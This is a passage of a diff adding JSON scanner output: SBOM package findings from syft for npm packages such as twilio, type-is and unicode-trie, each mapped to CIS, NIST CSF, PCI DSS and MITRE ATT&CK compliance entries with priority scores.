"cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "15d8d07e284b7f66", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: tslib 2.8.1", + "title": "tslib 2.8.1", + "description": "Package discovered: tslib 2.8.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "732c6f5be784c8f2", + "name": "tslib", + "version": "2.8.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "0BSD", + "spdxExpression": "0BSD", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:tslib:tslib:2.8.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/tslib@2.8.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", + "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d407f6f6881f51f1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: twilio 5.13.1", + "title": "twilio 5.13.1", + "description": "Package discovered: twilio 5.13.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b26b672319df2e47", + "name": "twilio", + "version": "5.13.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:twilio:twilio:5.13.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/twilio@5.13.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/twilio/-/twilio-5.13.1.tgz", + "integrity": "sha512-sT+PkhptF4Mf7t8eXFFvPQx4w5VHnBIPXbltGPMFRe+R2GxfRdMuFbuNA/cEm0aQR6LFQOn33+fhClg+TjRVqQ==", + "dependencies": { + "axios": "^1.13.5", + "dayjs": "^1.11.9", + "https-proxy-agent": "^5.0.0", + "jsonwebtoken": "^9.0.3", + "qs": "^6.14.1", + "scmp": "^2.1.0", + "xmlbuilder": "^13.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1b446cdccc9a93b0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: type-is 1.6.18", + "title": "type-is 1.6.18", + "description": "Package discovered: type-is 1.6.18", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a8ca97010550105a", + "name": "type-is", + "version": "1.6.18", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:type-is:type-is:1.6.18:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:type-is:type_is:1.6.18:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:type_is:type-is:1.6.18:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:type_is:type_is:1.6.18:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:type:type-is:1.6.18:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:type:type_is:1.6.18:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/type-is@1.6.18", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz", + "integrity": "sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==", + "dependencies": { + "media-typer": "0.3.0", + "mime-types": "~2.1.24" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a01b70906be81bf9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: typedarray 0.0.6", + "title": "typedarray 0.0.6", + "description": "Package discovered: typedarray 0.0.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e635ba578a775ab5", + "name": "typedarray", + "version": "0.0.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:typedarray:typedarray:0.0.6:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/typedarray@0.0.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", + "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "730b4341f8da3a62", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: undici-types 6.21.0", + "title": "undici-types 6.21.0", + "description": "Package discovered: undici-types 6.21.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9968e425c772df9f", + "name": "undici-types", + "version": "6.21.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:undici-types:undici-types:6.21.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:undici-types:undici_types:6.21.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:undici_types:undici-types:6.21.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:undici_types:undici_types:6.21.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:undici:undici-types:6.21.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:undici:undici_types:6.21.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/undici-types@6.21.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a49eb5c706dbb178", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: unicode-properties 1.4.1", + "title": "unicode-properties 1.4.1", + "description": "Package discovered: unicode-properties 1.4.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "541fbe3121e73dce", + "name": "unicode-properties", + "version": "1.4.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:unicode-properties:unicode-properties:1.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode-properties:unicode_properties:1.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode_properties:unicode-properties:1.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode_properties:unicode_properties:1.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode:unicode-properties:1.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode:unicode_properties:1.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/unicode-properties@1.4.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/unicode-properties/-/unicode-properties-1.4.1.tgz", + "integrity": "sha512-CLjCCLQ6UuMxWnbIylkisbRj31qxHPAurvena/0iwSVbQ2G1VY5/HjV0IRabOEbDHlzZlRdCrD4NhB0JtU40Pg==", + "dependencies": { + "base64-js": "^1.3.0", + "unicode-trie": "^2.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d33b9ca7e3f48cc1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: unicode-trie 2.0.0", + "title": "unicode-trie 2.0.0", + "description": "Package discovered: unicode-trie 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "aac566dbf0b492ea", + "name": "unicode-trie", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:unicode-trie:unicode-trie:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode-trie:unicode_trie:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode_trie:unicode-trie:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode_trie:unicode_trie:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode:unicode-trie:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:unicode:unicode_trie:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/unicode-trie@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/unicode-trie/-/unicode-trie-2.0.0.tgz", + "integrity": "sha512-x7bc76x0bm4prf1VLg79uhAzKw8DVboClSN5VxJuQ+LKDOVEW9CdH+VY7SP+vX7xCYQqzzgQpFqz15zeLvAtZQ==", + "dependencies": { + "pako": "^0.2.5", + "tiny-inflate": "^1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4121fde58e5100ef", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: unpipe 1.0.0", + "title": "unpipe 1.0.0", + "description": "Package discovered: unpipe 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "294cc6dab10e14ff", + "name": "unpipe", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:unpipe:unpipe:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/unpipe@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz", + "integrity": "sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0c87db67edbd6edf", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: update-browserslist-db 1.2.3", + "title": "update-browserslist-db 1.2.3", + "description": "Package discovered: update-browserslist-db 1.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": 